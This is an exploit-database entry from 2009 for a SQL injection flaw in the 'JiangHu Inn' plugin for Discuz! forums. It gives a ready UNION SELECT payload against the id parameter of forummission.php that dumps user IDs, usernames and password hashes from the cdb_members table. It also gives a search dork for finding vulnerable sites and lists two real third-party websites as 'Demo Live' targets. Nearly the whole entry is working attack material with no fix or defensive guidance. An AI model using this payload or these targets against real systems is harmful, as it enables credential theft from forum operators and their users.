[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Discuz! Plugin JiangHu <= 1.1 (id) SQL Injection Vulnerability
# Published : 2009-09-02
# Author : ZhaoHuAn
# Previous Title : PHPope <= 1.0.0 Multiple Remote File Inclusion Vulnerabilities
# Next Title : Ve-EDIT 0.1.4 (highlighter) Remote File Inclusion Vulnerability


=========================================================
Discuz! Plugin JiangHu <= 1.1 Sql injection Vulnerability
=========================================================

========================[Author]=========================                   

 [+] Founded 	: ZhaoHuAn				     
 [+] Contact	: ZhengXing[at]shandagames[dot]com	         
 [+] Blog	: http://www.patching.net/zhaohuan/	         
 [+] Date	: Feb, 9th 2009	 
 [+] Update	: Sep, 1th 2009	
								 
========================[Soft Info]======================		 
								 
Software: Discuz! Plugin JiangHu Inn		         
Version	: 1.1					                 
Vendor	: http://www.discuz.com
d0rk    : inurl:forummission.php			             	 



[-] Exploit:
[+] and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--

[-] SqlI PoC:
[+] http://target/[path]/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--

[+] Demo Live:
[-] http://www.palslp.com/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--

[-] http://bbs.sunspals.com/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--


/---------------------------------------------www.zhaohuan.net-------------------------------------------------  

                                            Greetz : Snda Security Team
                                                    & Normal is boring - -!

--------------------------------------------------------------------------------------------------------------/

# www.Syue.com [2009-09-02]